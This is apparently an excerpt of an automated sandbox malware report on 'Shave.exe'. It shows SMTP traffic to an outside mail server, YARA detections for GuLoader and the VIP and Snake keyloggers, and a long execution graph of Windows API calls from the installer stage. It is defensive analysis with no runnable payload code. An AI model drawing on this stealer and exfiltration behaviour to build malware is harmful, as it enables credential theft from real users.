                                                                                                                              Nov 25, 2024 07:09:54.017061949 CET49925587192.168.2.5199.79.63.24DATA
                                                                                                                              Nov 25, 2024 07:09:54.401535034 CET58749925199.79.63.24192.168.2.5354 Enter message, ending with "." on a line by itself
                                                                                                                              Nov 25, 2024 07:09:54.405431986 CET49925587192.168.2.5199.79.63.24.
                                                                                                                              Nov 25, 2024 07:09:54.799392939 CET58749925199.79.63.24192.168.2.5250 OK id=1tFSIE-000OFW-0f

                                                                                                                              Click to jump to process

                                                                                                                              Click to jump to process

                                                                                                                              Click to dive into process behavior distribution

                                                                                                                              Click to jump to process

                                                                                                                              Target ID:0
                                                                                                                              Start time:01:07:58
                                                                                                                              Start date:25/11/2024
                                                                                                                              Path:C:\Users\user\Desktop\Shave.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\Desktop\Shave.exe"
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:549'424 bytes
                                                                                                                              MD5 hash:51000C141B602569CF44B0F8BEC9ECB8
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.2342460807.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2342825551.0000000004332000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              Target ID:3
                                                                                                                              Start time:01:08:29
                                                                                                                              Start date:25/11/2024
                                                                                                                              Path:C:\Users\user\Desktop\Shave.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\Desktop\Shave.exe"
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:549'424 bytes
                                                                                                                              MD5 hash:51000C141B602569CF44B0F8BEC9ECB8
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000003.00000002.3299164468.000000003526B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3299164468.0000000035238000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3299164468.0000000035131000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:low
                                                                                                                              Has exited:false

                                                                                                                              Reset < >

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:19.2%
                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                Signature Coverage:19.5%
                                                                                                                                Total number of Nodes:1562
                                                                                                                                Total number of Limit Nodes:39
                                                                                                                                execution_graph 4002 6f972997 4003 6f9729e7 4002->4003 4004 6f9729a7 VirtualProtect 4002->4004 4004->4003 4005 401941 4006 401943 4005->4006 4011 402c41 4006->4011 4012 402c4d 4011->4012 4057 4062b9 4012->4057 4015 401948 4017 4059a9 4015->4017 4099 405c74 4017->4099 4020 4059d1 DeleteFileW 4022 401951 4020->4022 4021 4059e8 4023 405b13 4021->4023 4113 406297 lstrcpynW 4021->4113 4023->4022 4142 4065da FindFirstFileW 4023->4142 4025 405a0e 4026 405a21 4025->4026 4027 405a14 lstrcatW 4025->4027 4114 405bb8 lstrlenW 4026->4114 4028 405a27 4027->4028 4031 405a37 lstrcatW 4028->4031 4032 405a2d 4028->4032 4034 405a42 lstrlenW FindFirstFileW 4031->4034 4032->4031 4032->4034 4036 405b08 4034->4036 4046 405a64 4034->4046 4035 405b31 4145 405b6c lstrlenW CharPrevW 4035->4145 4036->4023 4039 405aeb FindNextFileW 4042 405b01 FindClose 4039->4042 4039->4046 4040 405961 5 API calls 4043 405b43 4040->4043 4042->4036 4044 405b47 4043->4044 4045 405b5d 4043->4045 4044->4022 4049 4052ff 24 API calls 4044->4049 4048 4052ff 24 API calls 4045->4048 4046->4039 4050 4059a9 60 API calls 4046->4050 4053 4052ff 24 API calls 4046->4053 4118 406297 lstrcpynW 4046->4118 4119 405961 4046->4119 4127 4052ff 4046->4127 4138 40605d MoveFileExW 4046->4138 4048->4022 4051 405b54 4049->4051 4050->4046 4052 40605d 36 API calls 4051->4052 4054 405b5b 4052->4054 4053->4039 4054->4022 4072 4062c6 4057->4072 4058 406511 4059 402c6e 4058->4059 4090 406297 lstrcpynW 4058->4090 4059->4015 4074 40652b 4059->4074 4061 4064df lstrlenW 4061->4072 4064 4062b9 10 API calls 4064->4061 4066 4063f4 GetSystemDirectoryW 4066->4072 4067 406407 GetWindowsDirectoryW 4067->4072 4068 40652b 5 API calls 4068->4072 4069 40643b SHGetSpecialFolderLocation 4069->4072 4073 406453 SHGetPathFromIDListW CoTaskMemFree 4069->4073 4070 4062b9 10 API calls 4070->4072 4071 406482 lstrcatW 4071->4072 4072->4058 4072->4061 4072->4064 4072->4066 4072->4067 4072->4068 4072->4069 4072->4070 4072->4071 4083 406165 4072->4083 4088 4061de wsprintfW 4072->4088 4089 406297 lstrcpynW 4072->4089 4073->4072 4077 406538 4074->4077 4075 4065ae 4076 4065b3 CharPrevW 4075->4076 4079 4065d4 4075->4079 4076->4075 4077->4075 4078 4065a1 CharNextW 4077->4078 4081 40658d CharNextW 4077->4081 4082 40659c CharNextW 4077->4082 4095 405b99 4077->4095 4078->4075 4078->4077 4079->4015 4081->4077 4082->4078 4091 406104 4083->4091 4086 4061c9 4086->4072 4087 406199 RegQueryValueExW RegCloseKey 4087->4086 4088->4072 4089->4072 4090->4059 4092 406113 4091->4092 4093 40611c RegOpenKeyExW 4092->4093 4094 406117 4092->4094 4093->4094 4094->4086 4094->4087 4096 405b9f 4095->4096 4097 405bb5 4096->4097 4098 405ba6 CharNextW 4096->4098 4097->4077 4098->4096 4148 406297 lstrcpynW 4099->4148 4101 405c85 4149 405c17 CharNextW CharNextW 4101->4149 4104 4059c9 4104->4020 4104->4021 4105 40652b 5 API calls 4111 405c9b 4105->4111 4106 405ccc lstrlenW 4107 405cd7 4106->4107 4106->4111 4109 405b6c 3 API calls 4107->4109 4108 4065da 2 API calls 4108->4111 4110 405cdc GetFileAttributesW 4109->4110 4110->4104 4111->4104 4111->4106 4111->4108 4112 405bb8 2 API calls 4111->4112 4112->4106 4113->4025 4115 405bc6 4114->4115 4116 405bd8 4115->4116 4117 405bcc CharPrevW 4115->4117 4116->4028 4117->4115 4117->4116 4118->4046 4155 405d68 GetFileAttributesW 4119->4155 4122 405984 DeleteFileW 4125 40598a 4122->4125 4123 40597c RemoveDirectoryW 4123->4125 4124 40598e 4124->4046 4125->4124 4126 40599a SetFileAttributesW 4125->4126 4126->4124 4129 40531a 4127->4129 4137 4053bc 4127->4137 4128 405336 lstrlenW 4131 405344 lstrlenW 4128->4131 4132 40535f 4128->4132 4129->4128 4130 4062b9 17 API calls 4129->4130 4130->4128 4133 405356 lstrcatW 4131->4133 4131->4137 4134 405372 4132->4134 4135 405365 SetWindowTextW 4132->4135 4133->4132 4136 405378 SendMessageW SendMessageW SendMessageW 4134->4136 4134->4137 4135->4134 4136->4137 4137->4046 4139 40607e 4138->4139 4140 406071 4138->4140 4139->4046 4158 405ee3 4140->4158 4143 4065f0 FindClose 4142->4143 4144 405b2d 4142->4144 4143->4144 4144->4022 4144->4035 4146 405b37 4145->4146 4147 405b88 lstrcatW 4145->4147 4146->4040 4147->4146 4148->4101 4150 405c34 4149->4150 4153 405c46 4149->4153 4151 405c41 CharNextW 4150->4151 4150->4153 4154 405c6a 4151->4154 4152 405b99 CharNextW 4152->4153 4153->4152 4153->4154 4154->4104 4154->4105 4156 40596d 4155->4156 4157 405d7a SetFileAttributesW 4155->4157 4156->4122 4156->4123 4156->4124 4157->4156 4159 405f13 4158->4159 4160 405f39 GetShortPathNameW 4158->4160 4185 405d8d GetFileAttributesW CreateFileW 4159->4185 4161 406058 4160->4161 4162 405f4e 4160->4162 4161->4139 4162->4161 4164 405f56 wsprintfA 4162->4164 4166 4062b9 17 API calls 4164->4166 4165 405f1d CloseHandle GetShortPathNameW 4165->4161 4167 405f31 4165->4167 4168 405f7e 4166->4168 4167->4160 4167->4161 4186 405d8d GetFileAttributesW CreateFileW 4168->4186 4170 405f8b 4170->4161 4171 405f9a GetFileSize GlobalAlloc 4170->4171 4172 406051 CloseHandle 4171->4172 4173 405fbc 4171->4173 4172->4161 4187 405e10 ReadFile 4173->4187 4178 405fdb lstrcpyA 4181 405ffd 4178->4181 4179 405fef 4180 405cf2 4 API calls 4179->4180 4180->4181 4182 406034 SetFilePointer 4181->4182 4194 405e3f WriteFile 4182->4194 4185->4165 4186->4170 4188 405e2e 4187->4188 4188->4172 4189 405cf2 lstrlenA 4188->4189 4190 405d33 lstrlenA 4189->4190 4191 405d3b 4190->4191 4192 405d0c lstrcmpiA 4190->4192 4191->4178 4191->4179 4192->4191 4193 405d2a CharNextA 4192->4193 4193->4190 4195 405e5d GlobalFree 4194->4195 4195->4172 4196 4015c1 4197 402c41 17 API calls 4196->4197 4198 4015c8 4197->4198 4199 405c17 4 API calls 4198->4199 4204 4015d1 4199->4204 4200 401631 4202 401663 4200->4202 4203 401636 4200->4203 4201 405b99 CharNextW 4201->4204 4206 401423 24 API calls 4202->4206 4223 401423 4203->4223 4204->4200 4204->4201 4213 401617 GetFileAttributesW 4204->4213 4215 405868 4204->4215 4218 4057ce CreateDirectoryW 4204->4218 4227 40584b CreateDirectoryW 4204->4227 4209 40165b 4206->4209 4212 40164a SetCurrentDirectoryW 4212->4209 4213->4204 4230 406671 GetModuleHandleA 4215->4230 4219 40581b 4218->4219 4220 40581f GetLastError 4218->4220 4219->4204 4220->4219 4221 40582e SetFileSecurityW 4220->4221 4221->4219 4222 405844 GetLastError 4221->4222 4222->4219 4224 4052ff 24 API calls 4223->4224 4225 401431 4224->4225 4226 406297 lstrcpynW 4225->4226 4226->4212 4228 40585b 4227->4228 4229 40585f GetLastError 4227->4229 4228->4204 4229->4228 4231 406697 GetProcAddress 4230->4231 4232 40668d 4230->4232 4233 40586f 4231->4233 4236 406601 GetSystemDirectoryW 4232->4236 4233->4204 4235 406693 4235->4231 4235->4233 4237 406623 wsprintfW LoadLibraryExW 4236->4237 4237->4235 5053 404344 lstrcpynW lstrlenW 5054 403945 5055 403950 5054->5055 5056 403957 GlobalAlloc 5055->5056 5057 403954 5055->5057 5056->5057 4312 401e49 4313 402c1f 17 API calls 4312->4313 4314 401e4f 4313->4314 4315 402c1f 17 API calls 4314->4315 4316 401e5b 4315->4316 4317 401e72 EnableWindow 4316->4317 4318 401e67 ShowWindow 4316->4318 4319 402ac5 4317->4319 4318->4319 5058 40264a 5059 402c1f 17 API calls 5058->5059 5060 402659 5059->5060 5061 4026a3 ReadFile 5060->5061 5062 405e10 ReadFile 5060->5062 5063 4026e3 MultiByteToWideChar 5060->5063 5064 402798 5060->5064 5067 402709 SetFilePointer MultiByteToWideChar 5060->5067 5068 4027a9 5060->5068 5070 402796 5060->5070 5071 405e6e SetFilePointer 5060->5071 5061->5060 5061->5070 5062->5060 5063->5060 5080 4061de wsprintfW 5064->5080 5067->5060 5069 4027ca SetFilePointer 5068->5069 5068->5070 5069->5070 5072 405e8a 5071->5072 5075 405ea2 5071->5075 5073 405e10 ReadFile 5072->5073 5074 405e96 5073->5074 5074->5075 5076 405ed3 SetFilePointer 5074->5076 5077 405eab SetFilePointer 5074->5077 5075->5060 5076->5075 5077->5076 5078 405eb6 5077->5078 5079 405e3f WriteFile 5078->5079 5079->5075 5080->5070 5084 4016cc 5085 402c41 17 API calls 5084->5085 5086 4016d2 GetFullPathNameW 5085->5086 5089 4016ec 5086->5089 5093 40170e 5086->5093 5087 401723 GetShortPathNameW 5088 402ac5 5087->5088 5090 4065da 2 API calls 5089->5090 5089->5093 5091 4016fe 5090->5091 5091->5093 5094 406297 lstrcpynW 5091->5094 5093->5087 5093->5088 5094->5093 5095 4043cd 5096 4044ff 5095->5096 5098 4043e5 5095->5098 5097 404569 5096->5097 5099 404633 5096->5099 5104 40453a GetDlgItem SendMessageW 5096->5104 5097->5099 5100 404573 GetDlgItem 5097->5100 5101 40420e 18 API calls 5098->5101 5106 404275 8 API calls 5099->5106 5102 4045f4 5100->5102 5103 40458d 5100->5103 5105 40444c 5101->5105 5102->5099 5107 404606 5102->5107 5103->5102 5111 4045b3 SendMessageW LoadCursorW SetCursor 5103->5111 5128 404230 EnableWindow 5104->5128 5109 40420e 18 API calls 5105->5109 5110 40462e 5106->5110 5112 40461c 5107->5112 5113 40460c SendMessageW 5107->5113 5115 404459 CheckDlgButton 5109->5115 5132 40467c 5111->5132 5112->5110 5117 404622 SendMessageW 5112->5117 5113->5112 5114 404564 5129 404658 5114->5129 5126 404230 EnableWindow 5115->5126 5117->5110 5121 404477 GetDlgItem 5127 404243 SendMessageW 5121->5127 5123 40448d SendMessageW 5124 4044b3 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5123->5124 5125 4044aa GetSysColor 5123->5125 5124->5110 5125->5124 5126->5121 5127->5123 5128->5114 5130 404666 5129->5130 5131 40466b SendMessageW 5129->5131 5130->5131 5131->5097 5135 4058c3 ShellExecuteExW 5132->5135 5134 4045e2 LoadCursorW SetCursor 5134->5102 5135->5134 5136 40234e 5137 402c41 17 API calls 5136->5137 5138 40235d 5137->5138 5139 402c41 17 API calls 5138->5139 5140 402366 5139->5140 5141 402c41 17 API calls 5140->5141 5142 402370 GetPrivateProfileStringW 5141->5142 5143 401b53 5144 402c41 17 API calls 5143->5144 5145 401b5a 5144->5145 5146 402c1f 17 API calls 5145->5146 5147 401b63 wsprintfW 5146->5147 5148 402ac5 5147->5148 5149 404a55 5150 404a81 5149->5150 5151 404a65 5149->5151 5153 404ab4 5150->5153 5154 404a87 SHGetPathFromIDListW 5150->5154 5160 4058e1 GetDlgItemTextW 5151->5160 5156 404a97 5154->5156 5159 404a9e SendMessageW 5154->5159 5155 404a72 SendMessageW 5155->5150 5158 40140b 2 API calls 5156->5158 5158->5159 5159->5153 5160->5155 5161 6f972301 5162 6f97236b 5161->5162 5163 6f972395 5162->5163 5164 6f972376 GlobalAlloc 5162->5164 5164->5162 5165 401956 5166 402c41 17 API calls 5165->5166 5167 40195d lstrlenW 5166->5167 5168 402592 5167->5168 4939 4014d7 4940 402c1f 17 API calls 4939->4940 4941 4014dd Sleep 4940->4941 4943 402ac5 4941->4943 5169 6f971000 5172 6f97101b 5169->5172 5179 6f971516 5172->5179 5174 6f971020 5175 6f971027 GlobalAlloc 5174->5175 5176 6f971024 5174->5176 5175->5176 5177 6f97153d 3 API calls 5176->5177 5178 6f971019 5177->5178 5180 6f97151c 5179->5180 5181 6f971522 5180->5181 5182 6f97152e GlobalFree 5180->5182 5181->5174 5182->5174 5183 402259 5184 402c41 17 API calls 5183->5184 5185 40225f 5184->5185 5186 402c41 17 API calls 5185->5186 5187 402268 5186->5187 5188 402c41 17 API calls 5187->5188 5189 402271 5188->5189 5190 4065da 2 API calls 5189->5190 5191 40227a 5190->5191 5192 40228b lstrlenW lstrlenW 5191->5192 5197 40227e 5191->5197 5194 4052ff 24 API calls 5192->5194 5193 4052ff 24 API calls 5196 402286 5193->5196 5195 4022c9 SHFileOperationW 5194->5195 5195->5196 5195->5197 5197->5193 5047 40175c 5048 402c41 17 API calls 5047->5048 5049 401763 5048->5049 5050 405dbc 2 API calls 5049->5050 5051 40176a 5050->5051 5052 405dbc 2 API calls 5051->5052 5052->5051 5198 4022dd 5199 4022e4 5198->5199 5202 4022f7 5198->5202 5200 4062b9 17 API calls 5199->5200 5201 4022f1 5200->5201 5203 4058fd MessageBoxIndirectW 5201->5203 5203->5202 5204 401d5d GetDlgItem GetClientRect 5205 402c41 17 API calls 5204->5205 5206 401d8f LoadImageW SendMessageW 5205->5206 5207 402ac5 5206->5207 5208 401dad DeleteObject 5206->5208 5208->5207 5209 401563 5210 402a6b 5209->5210 5213 4061de wsprintfW 5210->5213 5212 402a70 5213->5212 4243 4023e4 4244 402c41 17 API calls 4243->4244 4245 4023f6 4244->4245 4246 402c41 17 API calls 4245->4246 4247 402400 4246->4247 4260 402cd1 4247->4260 4250 40288b 4251 402438 4252 402444 4251->4252 4264 402c1f 4251->4264 4255 402463 RegSetValueExW 4252->4255 4267 403116 4252->4267 4253 402c41 17 API calls 4256 40242e lstrlenW 4253->4256 4258 402479 RegCloseKey 4255->4258 4256->4251 4258->4250 4261 402cec 4260->4261 4287 406132 4261->4287 4265 4062b9 17 API calls 4264->4265 4266 402c34 4265->4266 4266->4252 4268 40312f 4267->4268 4269 40315d 4268->4269 4294 403324 SetFilePointer 4268->4294 4291 40330e 4269->4291 4273 4032a7 4275 4032e9 4273->4275 4279 4032ab 4273->4279 4274 40317a GetTickCount 4282 403291 4274->4282 4285 4031a6 4274->4285 4276 40330e ReadFile 4275->4276 4276->4282 4277 40330e ReadFile 4277->4285 4278 40330e ReadFile 4278->4279 4279->4278 4280 405e3f WriteFile 4279->4280 4279->4282 4280->4279 4281 4031fc GetTickCount 4281->4285 4282->4255 4283 403221 MulDiv wsprintfW 4284 4052ff 24 API calls 4283->4284 4284->4285 4285->4277 4285->4281 4285->4282 4285->4283 4286 405e3f WriteFile 4285->4286 4286->4285 4288 406141 4287->4288 4289 402410 4288->4289 4290 40614c RegCreateKeyExW 4288->4290 4289->4250 4289->4251 4289->4253 4290->4289 4292 405e10 ReadFile 4291->4292 4293 403168 4292->4293 4293->4273 4293->4274 4293->4282 4294->4269 5214 402868 5215 402c41 17 API calls 5214->5215 5216 40286f FindFirstFileW 5215->5216 5217 402897 5216->5217 5220 402882 5216->5220 5222 4061de wsprintfW 5217->5222 5219 4028a0 5223 406297 lstrcpynW 5219->5223 5222->5219 5223->5220 5224 401968 5225 402c1f 17 API calls 5224->5225 5226 40196f 5225->5226 5227 402c1f 17 API calls 5226->5227 5228 40197c 5227->5228 5229 402c41 17 API calls 5228->5229 5230 401993 lstrlenW 5229->5230 5232 4019a4 5230->5232 5231 4019e5 5232->5231 5236 406297 lstrcpynW 5232->5236 5234 4019d5 5234->5231 5235 4019da lstrlenW 5234->5235 5235->5231 5236->5234 5237 40166a 5238 402c41 17 API calls 5237->5238 5239 401670 5238->5239 5240 4065da 2 API calls 5239->5240 5241 401676 5240->5241 5242 6f97103d 5243 6f97101b 5 API calls 5242->5243 5244 6f971056 5243->5244 4320 40336c SetErrorMode GetVersion 4321 4033ab 4320->4321 4322 4033b1 4320->4322 4323 406671 5 API calls 4321->4323 4324 406601 3 API calls 4322->4324 4323->4322 4325 4033c7 lstrlenA 4324->4325 4325->4322 4326 4033d7 4325->4326 4327 406671 5 API calls 4326->4327 4328 4033de 4327->4328 4329 406671 5 API calls 4328->4329 4330 4033e5 4329->4330 4331 406671 5 API calls 4330->4331 4332 4033f1 #17 OleInitialize SHGetFileInfoW 4331->4332 4410 406297 lstrcpynW 4332->4410 4335 40343d GetCommandLineW 4411 406297 lstrcpynW 4335->4411 4337 40344f 4338 405b99 CharNextW 4337->4338 4339 403474 CharNextW 4338->4339 4340 40359e GetTempPathW 4339->4340 4350 40348d 4339->4350 4412 40333b 4340->4412 4342 4035b6 4343 403610 DeleteFileW 4342->4343 4344 4035ba GetWindowsDirectoryW lstrcatW 4342->4344 4422 402edd GetTickCount GetModuleFileNameW 4343->4422 4345 40333b 12 API calls 4344->4345 4348 4035d6 4345->4348 4346 405b99 CharNextW 4346->4350 4348->4343 4351 4035da GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4348->4351 4349 403624 4352 4036c7 4349->4352 4357 405b99 CharNextW 4349->4357 4405 4036d7 4349->4405 4350->4346 4354 403589 4350->4354 4356 403587 4350->4356 4355 40333b 12 API calls 4351->4355 4450 403987 4352->4450 4506 406297 lstrcpynW 4354->4506 4361 403608 4355->4361 4356->4340 4373 403643 4357->4373 4361->4343 4361->4405 4362 403811 4365 403895 ExitProcess 4362->4365 4366 403819 GetCurrentProcess OpenProcessToken 4362->4366 4363 4036f1 4516 4058fd 4363->4516 4371 403831 LookupPrivilegeValueW AdjustTokenPrivileges 4366->4371 4372 403865 4366->4372 4368 4036a1 4374 405c74 18 API calls 4368->4374 4369 403707 4375 405868 5 API calls 4369->4375 4371->4372 4376 406671 5 API calls 4372->4376 4373->4368 4373->4369 4378 4036ad 4374->4378 4379 40370c lstrcatW 4375->4379 4377 40386c 4376->4377 4380 403881 ExitWindowsEx 4377->4380 4383 40388e 4377->4383 4378->4405 4507 406297 lstrcpynW 4378->4507 4381 403728 lstrcatW lstrcmpiW 4379->4381 4382 40371d lstrcatW 4379->4382 4380->4365 4380->4383 4385 403744 4381->4385 4381->4405 4382->4381 4525 40140b 4383->4525 4386 403750 4385->4386 4387 403749 4385->4387 4391 40584b 2 API calls 4386->4391 4390 4057ce 4 API calls 4387->4390 4389 4036bc 4508 406297 lstrcpynW 4389->4508 4393 40374e 4390->4393 4394 403755 SetCurrentDirectoryW 4391->4394 4393->4394 4395 403770 4394->4395 4396 403765 4394->4396 4521 406297 lstrcpynW 4395->4521 4520 406297 lstrcpynW 4396->4520 4399 4062b9 17 API calls 4400 4037af DeleteFileW 4399->4400 4401 4037bc CopyFileW 4400->4401 4407 40377e 4400->4407 4401->4407 4402 403805 4404 40605d 36 API calls 4402->4404 4403 40605d 36 API calls 4403->4407 4404->4405 4509 4038ad 4405->4509 4406 4062b9 17 API calls 4406->4407 4407->4399 4407->4402 4407->4403 4407->4406 4409 4037f0 CloseHandle 4407->4409 4522 405880 CreateProcessW 4407->4522 4409->4407 4410->4335 4411->4337 4413 40652b 5 API calls 4412->4413 4415 403347 4413->4415 4414 403351 4414->4342 4415->4414 4416 405b6c 3 API calls 4415->4416 4417 403359 4416->4417 4418 40584b 2 API calls 4417->4418 4419 40335f 4418->4419 4528 405dbc 4419->4528 4532 405d8d GetFileAttributesW CreateFileW 4422->4532 4424 402f1d 4443 402f2d 4424->4443 4533 406297 lstrcpynW 4424->4533 4426 402f43 4427 405bb8 2 API calls 4426->4427 4428 402f49 4427->4428 4534 406297 lstrcpynW 4428->4534 4430 402f54 GetFileSize 4431 403050 4430->4431 4449 402f6b 4430->4449 4535 402e79 4431->4535 4433 403059 4435 403089 GlobalAlloc 4433->4435 4433->4443 4547 403324 SetFilePointer 4433->4547 4434 40330e ReadFile 4434->4449 4546 403324 SetFilePointer 4435->4546 4438 4030bc 4440 402e79 6 API calls 4438->4440 4439 4030a4 4442 403116 31 API calls 4439->4442 4440->4443 4441 403072 4444 40330e ReadFile 4441->4444 4447 4030b0 4442->4447 4443->4349 4445 40307d 4444->4445 4445->4435 4445->4443 4446 402e79 6 API calls 4446->4449 4447->4443 4447->4447 4448 4030ed SetFilePointer 4447->4448 4448->4443 4449->4431 4449->4434 4449->4438 4449->4443 4449->4446 4451 406671 5 API calls 4450->4451 4452 40399b 4451->4452 4453 4039a1 GetUserDefaultUILanguage 4452->4453 4454 4039b3 4452->4454 4552 4061de wsprintfW 4453->4552 4456 406165 3 API calls 4454->4456 4458 4039e3 4456->4458 4457 4039b1 4553 403c5d 4457->4553 4459 403a02 lstrcatW 4458->4459 4461 406165 3 API calls 4458->4461 4459->4457 4461->4459 4463 405c74 18 API calls 4464 403a34 4463->4464 4465 403ac8 4464->4465 4467 406165 3 API calls 4464->4467 4466 405c74 18 API calls 4465->4466 4468 403ace 4466->4468 4475 403a66 4467->4475 4469 403ade LoadImageW 4468->4469 4470 4062b9 17 API calls 4468->4470 4471 403b84 4469->4471 4472 403b05 RegisterClassW 4469->4472 4470->4469 4473 40140b 2 API calls 4471->4473 4476 403b3b SystemParametersInfoW CreateWindowExW 4472->4476 4505 403b8e 4472->4505 4477 403b8a 4473->4477 4474 403a87 lstrlenW 4479 403a95 lstrcmpiW 4474->4479 4480 403abb 4474->4480 4475->4465 4475->4474 4478 405b99 CharNextW 4475->4478 4476->4471 4485 403c5d 18 API calls 4477->4485 4477->4505 4482 403a84 4478->4482 4479->4480 4483 403aa5 GetFileAttributesW 4479->4483 4481 405b6c 3 API calls 4480->4481 4486 403ac1 4481->4486 4482->4474 4484 403ab1 4483->4484 4484->4480 4487 405bb8 2 API calls 4484->4487 4488 403b9b 4485->4488 4561 406297 lstrcpynW 4486->4561 4487->4480 4490 403ba7 ShowWindow 4488->4490 4491 403c2a 4488->4491 4493 406601 3 API calls 4490->4493 4562 4053d2 OleInitialize 4491->4562 4495 403bbf 4493->4495 4494 403c30 4496 403c34 4494->4496 4497 403c4c 4494->4497 4498 403bcd GetClassInfoW 4495->4498 4500 406601 3 API calls 4495->4500 4503 40140b 2 API calls 4496->4503 4496->4505 4499 40140b 2 API calls 4497->4499 4501 403be1 GetClassInfoW RegisterClassW 4498->4501 4502 403bf7 DialogBoxParamW 4498->4502 4499->4505 4500->4498 4501->4502 4504 40140b 2 API calls 4502->4504 4503->4505 4504->4505 4505->4405 4506->4356 4507->4389 4508->4352 4510 4038c5 4509->4510 4511 4038b7 CloseHandle 4509->4511 4580 4038f2 4510->4580 4511->4510 4514 4059a9 67 API calls 4515 4036e0 OleUninitialize 4514->4515 4515->4362 4515->4363 4517 405912 4516->4517 4518 4036ff ExitProcess 4517->4518 4519 405926 MessageBoxIndirectW 4517->4519 4519->4518 4520->4395 4521->4407 4523 4058b3 CloseHandle 4522->4523 4524 4058bf 4522->4524 4523->4524 4524->4407 4526 401389 2 API calls 4525->4526 4527 401420 4526->4527 4527->4365 4529 405dc9 GetTickCount GetTempFileNameW 4528->4529 4530 405dff 4529->4530 4531 40336a 4529->4531 4530->4529 4530->4531 4531->4342 4532->4424 4533->4426 4534->4430 4536 402e82 4535->4536 4537 402e9a 4535->4537 4538 402e92 4536->4538 4539 402e8b DestroyWindow 4536->4539 4540 402ea2 4537->4540 4541 402eaa GetTickCount 4537->4541 4538->4433 4539->4538 4548 4066ad 4540->4548 4543 402eb8 CreateDialogParamW ShowWindow 4541->4543 4544 402edb 4541->4544 4543->4544 4544->4433 4546->4439 4547->4441 4549 4066ca PeekMessageW 4548->4549 4550 4066c0 DispatchMessageW 4549->4550 4551 402ea8 4549->4551 4550->4549 4551->4433 4552->4457 4554 403c71 4553->4554 4569 4061de wsprintfW 4554->4569 4556 403ce2 4570 403d16 4556->4570 4558 403a12 4558->4463 4559 403ce7 4559->4558 4560 4062b9 17 API calls 4559->4560 4560->4559 4561->4465 4573 40425a 4562->4573 4564 40425a SendMessageW 4566 40542e OleUninitialize 4564->4566 4565 4053f5 4568 40541c 4565->4568 4576 401389 4565->4576 4566->4494 4568->4564 4569->4556 4571 4062b9 17 API calls 4570->4571 4572 403d24 SetWindowTextW 4571->4572 4572->4559 4574 404272 4573->4574 4575 404263 SendMessageW 4573->4575 4574->4565 4575->4574 4578 401390 4576->4578 4577 4013fe 4577->4565 4578->4577 4579 4013cb MulDiv SendMessageW 4578->4579 4579->4578 4581 403900 4580->4581 4582 4038ca 4581->4582 4583 403905 FreeLibrary GlobalFree 4581->4583 4582->4514 4583->4582 4583->4583 4584 40176f 4585 402c41 17 API calls 4584->4585 4586 401776 4585->4586 4587 401796 4586->4587 4588 40179e 4586->4588 4623 406297 lstrcpynW 4587->4623 4624 406297 lstrcpynW 4588->4624 4591 4017a9 4593 405b6c 3 API calls 4591->4593 4592 40179c 4595 40652b 5 API calls 4592->4595 4594 4017af lstrcatW 4593->4594 4594->4592 4598 4017bb 4595->4598 4596 4065da 2 API calls 4596->4598 4598->4596 4599 405d68 2 API calls 4598->4599 4600 4017cd CompareFileTime 4598->4600 4601 40188d 4598->4601 4606 406297 lstrcpynW 4598->4606 4609 4062b9 17 API calls 4598->4609 4618 4058fd MessageBoxIndirectW 4598->4618 4620 401864 4598->4620 4622 405d8d GetFileAttributesW CreateFileW 4598->4622 4599->4598 4600->4598 4602 4052ff 24 API calls 4601->4602 4604 401897 4602->4604 4603 4052ff 24 API calls 4621 401879 4603->4621 4605 403116 31 API calls 4604->4605 4607 4018aa 4605->4607 4606->4598 4608 4018be SetFileTime 4607->4608 4610 4018d0 CloseHandle 4607->4610 4608->4610 4609->4598 4611 4018e1 4610->4611 4610->4621 4612 4018e6 4611->4612 4613 4018f9 4611->4613 4614 4062b9 17 API calls 4612->4614 4615 4062b9 17 API calls 4613->4615 4616 4018ee lstrcatW 4614->4616 4617 401901 4615->4617 4616->4617 4619 4058fd MessageBoxIndirectW 4617->4619 4618->4598 4619->4621 4620->4603 4620->4621 4622->4598 4623->4592 4624->4591 5245 4027ef 5246 402a70 5245->5246 5247 4027f6 5245->5247 5248 402c1f 17 API calls 5247->5248 5249 4027fd 5248->5249 5250 40280c SetFilePointer 5249->5250 5250->5246 5251 40281c 5250->5251 5253 4061de wsprintfW 5251->5253 5253->5246 5254 401a72 5255 402c1f 17 API calls 5254->5255 5256 401a7b 5255->5256 5257 402c1f 17 API calls 5256->5257 5258 401a20 5257->5258 4813 405273 4814 405283 4813->4814 4815 405297 4813->4815 4816 4052e0 4814->4816 4817 405289 4814->4817 4818 40529f IsWindowVisible 4815->4818 4825 4052bf 4815->4825 4819 4052e5 CallWindowProcW 4816->4819 4820 40425a SendMessageW 4817->4820 4818->4816 4821 4052ac 4818->4821 4822 405293 4819->4822 4820->4822 4827 404bc9 SendMessageW 4821->4827 4825->4819 4832 404c49 4825->4832 4828 404c28 SendMessageW 4827->4828 